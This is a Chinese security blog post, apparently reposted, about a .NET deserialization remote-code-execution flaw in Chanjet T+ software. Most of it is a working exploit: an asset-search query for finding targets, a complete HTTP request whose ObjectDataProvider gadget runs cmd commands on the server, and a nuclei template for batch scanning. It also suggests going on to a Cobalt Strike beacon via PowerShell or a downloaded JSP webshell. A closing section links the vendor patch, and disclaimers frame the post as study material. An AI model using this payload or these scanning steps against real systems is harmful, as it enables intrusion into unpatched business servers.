用友畅捷通T+ 存在 .net反序列化漏洞至RCE

admin

137432
文章

113
评论

2023年10月25日22:53:01评论84 views字数 2729阅读9分5秒阅读模式

用友畅捷通T+ 存在 .net反序列化漏洞至RCE

漏洞复现

步骤一：使用以下语法进行资产搜索并确定攻击目标！！！

# 搜索语法app="畅捷通-TPlus"

步骤二：抓取首页数据包并改包如下...发送POC...

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36X-Ajaxpro-Method: GetStoreWarehouseByStoreHost: ipAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-type: application/x-www-form-urlencodedContent-Length: 597
{  "storeID":{    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",    "MethodName":"Start",    "ObjectInstance":{        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",        "StartInfo": {            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",            "FileName":"cmd", "Arguments":"/c ipconfig /all > test.txt"        }    }  }}

步骤三：访问其执行命令的日志文件即test.txt文件内容，地址如下...

http://ip/tplus/test.txt

用友畅捷通T+ 存在 .net反序列化漏洞至RCE

步骤四：后续利用思路为可直接powershell上线CS也可使用下载命令将JSP文件下载至目标服务器从而完成Getshell操作....

批量扫描

id: changjietong_GetStoreWarehouseByStore_rceinfo:  name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞  author: mhb17  severity: critical  description: variables:  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"requests:  - raw:      - |-        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36        X-Ajaxpro-Method: GetStoreWarehouseByStore        Host: {{Hostname}}        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2        Connection: close        Content-type: application/x-www-form-urlencoded        Content-Length: 577
        {          "storeID":{            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",            "MethodName":"Start",            "ObjectInstance":{                "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",                "StartInfo": {                    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",                    "FileName":"cmd", "Arguments":"/c whoami > {{file_name}}"                }            }          }        }      - |+        GET /tplus/{{file_name}} HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    req-condition: true    matchers:      - type: dsl        condition: and        dsl:          - 'contains((body_1), "System.ArgumentException") && status_code_2 == 200'

漏洞修复

* 目前官方已发布补丁更新，建议受影响用户尽快安装。* T+ 16.000.000.0283 及以上补丁包：https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

原文始发于微信公众号（揽月安全团队）：用友畅捷通T+ 存在 .net反序列化漏洞至RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

用友畅捷通T+ 存在 .net反序列化漏洞至RCE

Hackable_III

Vulnerable Docker 1靶机通关教学

xss靶场

PoC 针对 Ingress NGINX 漏洞编号 CVE-2025-1097、1098、24514、1974

实战-菠菜通杀

攻防实战|记一次和安全产品贴身肉搏

【红队思路】钓鱼-资源捆绑Bypass国内AV

Src高危实战记录

对DogsVsCats例子的调优模型训练过程（二）

Sitecore几年前的洞CVE-2019-9874：反序列化实现的未经认证的 RCE（CVSS 9.8）

发表评论

在线咨询

微信